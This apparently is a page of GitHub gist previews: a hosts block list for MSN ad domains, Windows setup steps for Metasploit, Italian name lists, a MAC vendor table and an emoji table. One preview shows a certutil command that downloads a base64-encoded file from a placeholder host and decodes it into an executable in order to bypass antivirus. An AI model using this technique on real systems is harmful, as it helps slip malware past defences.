https://gyazo.com/eb5c5741b6a9a16c692170a41a49c858.png

| 0.0.0.0 feedback.microsoft-hohm.com | |
| 0.0.0.0 search.msn.com | |
| 0.0.0.0 a.ads1.msn.com | |
| 0.0.0.0 a.ads2.msn.com | |
| 0.0.0.0 a.rad.msn.com | |
| 0.0.0.0 ac3.msn.com | |
| 0.0.0.0 ads.msn.com | |
| 0.0.0.0 ads1.msn.com | |
| 0.0.0.0 b.ads1.msn.com | |
| 0.0.0.0 b.rad.msn.com |
| This post links my 3Box profile to my Github account! Web3 social profiles by 3Box. | |
| ✅ did:3:bafyreib6e6as6gg5p6wqeulknfjaek4kobhp4z7ee4u2ox2xgjpqehr2me ✅ | |
| Create your profile today to start building social connection and trust online at https://3Box.io/ |
| Steps to install Metasploit on Windows 10 using the Windows Subsystem for Linux | |
| 1.) Enable Developer Mode | |
| C:\> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock" /t REG_DWORD /f /v "AllowDevelopmentWithoutDevLicense" /d "1" | |
| 2.) Enable Windows Subsystem for Linux | |
| C:\> DISM /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux | |
| 3.) Reboot |
| -- DISCLAIMER -- | |
| il presente elenco consiste in una raccolta di cognomi presenti sul territorio italiano (non necessariamente "italiani") | |
| viene generato prendendo processando automaticamente uno o più archivi anagrafici e non è controllato in alcun modo | |
| è pertanto altamente possibile che ci siano errori o refusi | |
| non è ne pretende di essere un elenco omnicomprensivo di tutti i cognomi esistenti | |
| ---------------- | |
| abbondanza | |
| abu | |
| accadia |
| -- DISCLAIMER -- | |
| il presente elenco consiste in una raccolta di nomi presenti sul territorio italiano (non necessariamente "italiani") | |
| viene generato prendendo processando automaticamente uno o più archivi anagrafici e non è controllato in alcun modo | |
| è pertanto altamente possibile che ci siano errori o refusi | |
| non è nè pretende di essere un elenco omnicomprensivo di tutti i nomi esistenti | |
| ---------------- | |
| abaco | |
| abbondanza | |
| abbondanzia |
| # script by JonnyBanana | |
| #https://github.com/JonnyBanana | |
| # this simple script asks to assign a name to a variable | |
| #and then asks how many variables it must print on the monitor | |
| # the output is like: | |
| # a1 = '' | |
| # a2 = '' | |
| # a3 = '' | |
| # a4 = '' | |
| # a5 = '' |
| 000000 Officially Xerox | |
| 000001 SuperLAN-2U | |
| 000002 BBN (was internal usage only, no longer used) | |
| 000003 XEROX CORPORATION | |
| 000004 XEROX CORPORATION | |
| 000005 XEROX CORPORATION | |
| 000006 XEROX CORPORATION | |
| 000007 XEROX CORPORATION | |
| 000008 XEROX CORPORATION | |
| 000009 powerpipes? |
| # certutil.exe bypass av on download + base64 Decoding | |
| #first base64 encoding the malicious file so that to an edge device it just appears as harmless text. | |
| #Then once the text file is downloaded, the "certutil.exe -decode" command can be used to decode the base64 encoded file | |
| #into the executable. https://www.browserling.com/tools/file-to-base64 | |
| #This is illustrated in Xavier Mertens handler diary. | |
| # https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/ | |
| C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt | |
| C:\Temp>certutil.exe -decode bad.txt bad.exe |
People
:bowtie: |
😄 :smile: |
😆 :laughing: |
|---|---|---|
😊 :blush: |
😃 :smiley: |
:relaxed: |
😏 :smirk: |
😍 :heart_eyes: |
😘 :kissing_heart: |
😚 :kissing_closed_eyes: |
😳 :flushed: |
😌 :relieved: |
😆 :satisfied: |
😁 :grin: |
😉 :wink: |
😜 :stuck_out_tongue_winking_eye: |
😝 :stuck_out_tongue_closed_eyes: |
😀 :grinning: |
😗 :kissing: |
😙 :kissing_smiling_eyes: |
😛 :stuck_out_tongue: |